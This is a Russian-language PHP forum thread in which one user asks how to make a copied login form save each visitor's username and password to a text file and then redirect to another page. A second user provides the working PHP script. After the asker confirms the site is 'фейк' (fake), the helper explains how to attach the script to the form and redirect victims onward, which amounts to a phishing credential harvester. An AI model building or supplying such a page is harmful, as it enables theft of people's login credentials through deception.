из Form записать данные в текстовый файл

Тема в разделе "PHP", создана пользователем dmx, 17 окт 2011.

Модераторы: latteo
  1. dmx

    dmx

    Регистр.:
    22 июн 2011
    Сообщения:
    662
    Симпатии:
    526
    Подскажите как реализовать : есть форма для ввода Логин-Пароль и кнопка отправить.
    PHP:
    <form method="post" action="http://site.ru/cgi-bin/auth" name="Auth" onSubmit="return CheckForm(this);">
    <
    input type="hidden" name="page" value="">
    <
    input type="hidden" name="post" value="">
    <
    input type="hidden" name="login_from" value="">
        <
    table>
         <
    tr>
            <
    td>
            <
    label class="login-form__label" for="login">Имя</label>
            </
    td>
            <
    td>
            <
    input type="text" id="login" name="Login" value="">
            </
    td>        
            </
    tr>
            <
    tr>
            <
    td class="login-form__td-label">
            <
    label class="login-form__label" for="password">Пароль</label>
            </
    td>
            <
    td>
            <
    input id="password" type="password" name="Password">
            </
    td>
            <
    tr>            
            <
    td><input id="EnterBtn" type="Submit"  value="Войти"></td>                
            </
    tr>
        </
    table>
    </
    form>
    Помогите написать обработчик, чтобы при нажатии "Войти" записывал Логин-Пароль в текстовый файл 1.txt и после этого редиректил на page2.php

    Можно и неполностью, хотя бы начать.
    Буду благодарен. :)
     
  2. thoth777

    thoth777

    Регистр.:
    28 ноя 2008
    Сообщения:
    314
    Симпатии:
    98
    PHP:
    <?php
    $fd
    =fopen("./1.txt","a");
    fwrite ($fd,$_POST['Login']."\t".$_POST['Password']."\n");
    fclose ($fd);
    header ("Location: /page2.php");
    ?>
    только у вас странное расположение скрипта в form action
    там php ли вообще?
     
    dmx нравится это.
  3. dmx

    dmx

    Регистр.:
    22 июн 2011
    Сообщения:
    662
    Симпатии:
    526
    thoth777 Спасибо.
    А помоги пожалуйста его ещё к этой форме прикрутить
     
  4. thoth777

    thoth777

    Регистр.:
    28 ноя 2008
    Сообщения:
    314
    Симпатии:
    98
    запросто

    первые 20 строк из site.ru/cgi-bin/auth процитируй пож
    что-то у меня подозрения что тот скрипт не на php

    если оно на php, то все очень просто

    на сайте-то авторизация работает, или это фэйковый сайт?
     
  5. dmx

    dmx

    Регистр.:
    22 июн 2011
    Сообщения:
    662
    Симпатии:
    526
    фейк .
    Это не обязательно site.ru/cgi-bin/auth
     
  6. thoth777

    thoth777

    Регистр.:
    28 ноя 2008
    Сообщения:
    314
    Симпатии:
    98
    тогда все просто

    в форме пишем
    <form method="post" action="auth.php">
    далее то что у тебя в форме

    код скрипта auth.php я уже привел

    в header("Location: пишем полный URL, если это на другой домен
    или путь к нужному скрипт

    например
    header ("Location: http://site.ru/адрес_страницы");
    или типа того.

    директория, в которой расположен auth.php должна быть доступна для записи
    можно сохранять в другую директорию
    тогда $fd=fopen("./имя_директории/1.php","a");

    соответственно, права на запись в директорию имя_директории должны быть установлены.
     
    dmx нравится это.